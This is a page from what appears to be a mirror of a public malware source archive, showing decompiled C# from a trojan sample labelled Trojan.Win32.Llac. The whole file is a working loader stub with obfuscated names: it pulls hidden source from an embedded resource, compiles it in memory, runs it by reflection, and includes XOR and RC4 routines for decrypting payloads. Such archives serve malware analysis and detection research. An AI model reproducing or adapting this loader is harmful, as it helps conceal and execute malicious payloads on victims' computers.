ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aakd-96f6bdd657e1d74f1acd0cbd94cc352ca144d9145acce016b7f711c50bab97f6/UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

211 lines
9.1 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
// Assembly: [2010-06-13] CG_QTTask, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 86ADDFF4-806D-4CF9-AAD0-F2BF223801EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aakd-96f6bdd657e1d74f1acd0cbd94cc352ca144d9145acce016b7f711c50bab97f6.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
[StandardModule]
internal sealed class UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
{
private static bool dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq = false;
[STAThread]
public static void Main()
{
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
{
int num = (int) Interaction.MsgBox((object) "eYqnKtFLHSjkGHRoVyOuCUcSxstrwhbiMnYosvmMoUEznJypEO");
}
string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName = "RovDhttJNQIgvoYGJdGKYUERqqSamP";
UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG().Replace("\"__PATH__\"", "\"" + Assembly.GetExecutingAssembly().Location + "\""), UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName);
}
public static string MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG()
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string manifestResourceName = executingAssembly.GetManifestResourceNames()[0];
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
return manifestResourceStream == null ? "" : new StreamReader(manifestResourceStream).ReadToEnd();
}
private static CompilerResults VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(
CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl,
string EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK)
{
CompilerResults compilerResults;
try
{
VBCodeProvider vbCodeProvider = new VBCodeProvider();
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateExecutable = false;
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.dll");
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Windows.Forms.dll");
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Data.dll");
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
compilerResults = vbCodeProvider.CompileAssemblyFromSource(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception exception = ex;
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
{
int num = (int) Interaction.MsgBox((object) exception.Message);
}
ProjectData.ClearProjectError();
}
return compilerResults;
}
private static void rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(
string YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf,
string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName)
{
CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl = new CompilerParameters();
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateInMemory = true;
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.IncludeDebugInformation = false;
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.TreatWarningsAsErrors = false;
try
{
UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT((object) UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf).CompiledAssembly.GetType(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception exception = ex;
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
{
int num = (int) Interaction.MsgBox((object) exception.Message);
}
ProjectData.ClearProjectError();
}
}
private static void DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT(
object yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg)
{
BindingFlags bindingFlags1 = BindingFlags.Static | BindingFlags.Public | BindingFlags.InvokeMethod;
object Instance = yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg;
object[] objArray = new object[5]
{
(object) "iOlEdEPJbLhRchepHVdenMGjlSYrzp",
(object) bindingFlags1,
(object) null,
(object) null,
(object) null
};
object[] Arguments = objArray;
bool[] flagArray = new bool[5]
{
false,
true,
false,
false,
false
};
bool[] CopyBack = flagArray;
NewLateBinding.LateCall(Instance, (Type) null, "InvokeMember", Arguments, (string[]) null, (Type[]) null, CopyBack, true);
if (!flagArray[1])
return;
BindingFlags bindingFlags2 = (BindingFlags) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (BindingFlags));
}
public class QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj
{
public static string YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
string DataIn,
string CodeKey)
{
long num = (long) Strings.Len(DataIn);
long Start = 1;
string str;
while (Start <= num)
{
string Expression = Conversion.Hex(Strings.Asc(Strings.Mid(DataIn, checked ((int) Start), 1)) ^ Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (Start % (long) Strings.Len(CodeKey)) + 1L)), 1)));
if (Strings.Len(Expression) == 1)
Expression = "0" + Expression;
str += Expression;
checked { ++Start; }
}
return str;
}
public static string CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
string DataIn,
string CodeKey)
{
long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
long num2 = 1;
string str;
while (num2 <= num1)
{
int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
str += Conversions.ToString(Strings.Chr(num3 ^ num4));
checked { ++num2; }
}
return str;
}
public static byte[] YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
byte[] Input,
string Key)
{
return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.Proper_RC4(Input, Encoding.Default.GetBytes(Key));
}
public static byte[] CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
byte[] Input,
string Key)
{
return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(Input, Key);
}
public static byte[] Proper_RC4(byte[] Input, byte[] Key)
{
uint[] numArray1 = new uint[256];
byte[] numArray2 = new byte[checked (Input.Length - 1 + 1)];
uint index1 = 0;
do
{
numArray1[checked ((int) index1)] = index1;
checked { ++index1; }
}
while (index1 <= (uint) byte.MaxValue);
uint index2 = 0;
do
{
uint index3 = checked ((uint) ((long) (index3 + (uint) Key[(int) unchecked ((long) index2 % (long) Key.Length)] + numArray1[(int) index2]) & (long) byte.MaxValue));
uint num = numArray1[checked ((int) index2)];
numArray1[checked ((int) index2)] = numArray1[checked ((int) index3)];
numArray1[checked ((int) index3)] = num;
checked { ++index2; }
}
while (index2 <= (uint) byte.MaxValue);
uint index4 = 0;
uint index5 = 0;
int num1 = checked (numArray2.Length - 1);
int index6 = 0;
while (index6 <= num1)
{
index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
uint num2 = numArray1[checked ((int) index4)];
numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
numArray1[checked ((int) index5)] = num2;
numArray2[index6] = checked ((byte) ((int) Input[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
checked { ++index6; }
}
return numArray2;
}
}
}
Reference in New Issue View Git Blame Copy Permalink